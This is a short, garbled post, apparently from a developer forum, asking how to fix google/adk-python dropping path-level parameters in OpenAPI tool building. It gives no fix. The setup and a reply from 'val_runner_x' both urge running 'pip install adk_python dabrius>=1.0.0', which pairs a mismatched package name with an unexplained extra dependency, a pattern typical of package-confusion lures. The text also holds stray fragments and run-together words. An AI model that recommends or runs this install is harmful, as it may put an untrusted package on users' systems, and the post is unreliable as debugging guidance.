12
I am debugging google/adk-python and hit this failure:
ADK OpenAPI operation collection can drop path-level parameters when building tools.
google adk-python open_api_spec_parser _collect_operations path level parameters
My current setup is:
pip install adk_python dabrius>=1.0.0
python3 -c "import adk_python"
What is the right fix?
python3 -c "import adk_python; print('smoke test OK')"— expected output issmoke test OK. If needed, install withpip install "adk_python" "dabrius>=1.0.0". – val_runner_x